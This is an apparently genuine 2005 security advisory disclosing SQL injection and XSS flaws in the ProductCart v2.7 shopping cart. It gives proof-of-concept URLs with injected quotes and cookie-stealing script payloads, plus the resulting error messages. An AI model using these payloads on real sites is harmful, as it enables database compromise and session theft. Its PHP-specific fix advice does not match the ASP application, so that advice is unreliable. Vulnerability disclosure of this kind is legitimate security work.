|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Sunday, 03 April 2005 18:14 |
 -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab "s Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Severity: Medium
Title: Multiple SQL INJECTION and XSS vulnerabilities in ProductCart v2.7
Date: 04/04/2005
Vendor: Early Impact
Vendor Website: http://www.earlyimpact.com
Summary: There are, multiple sql injection and xss vulnerabilities in productcart v2.7.
Information Dcrab"s Services: http://www.digitalparadox.org/services.ah
Proof of Concept Exploits:
http://localhost/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory="SQL_ERROR&idSupplier=10&resultCnt=999&keyword=dcrab
SQL ERROR
Type mismatch: "cint"
/productcart/pc/header.asp, line 110
http://localhost/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt="SQL_ERROR&keyword=dcrab
SQL ERROR
Provider error "80020005"
Type mismatch.
/productcart/pc/advSearch_h.asp, line 208
http://localhost/productcart/pc/advSearch_h.asp?priceFrom=0&priceUntil=999999999&idCategory=0&idSupplier=10&resultCnt=999&keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops Cookie
http://localhost/tarinasworld_butterflyjournal.asp?offset="SQL_INJECTION
SQL ERROR
Microsoft VBScript runtime error "800a000d"
Type mismatch: "offset"
/tarinasworld_butterflyjournal.asp, line 47
http://www.localhost/productcart/pc/NewCust.asp?redirectUrl=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops Cookie
http://www.localhost/storelocator_submit.asp?countrysearch=1&country=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops Cookie
http://www.localhost/productcart/pc/techErr.asp?error=<script>alert(document.cookie)</script>
Pops Cookie
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
Diabolic Crab"s Security Services: Contact at dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web application securing services, along with programming in php, vb, asp, c, c++, perl, java, html and graphic designing.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQk+spCZV5e8av/DUEQLdAgCfY5hWp9jqmFGMWPa3cMBDZbxhP0EAoK17
rNdnMkIvE+YjlCf2jSpZB85K
=wHSO
-----END PGP SIGNATURE-----
|
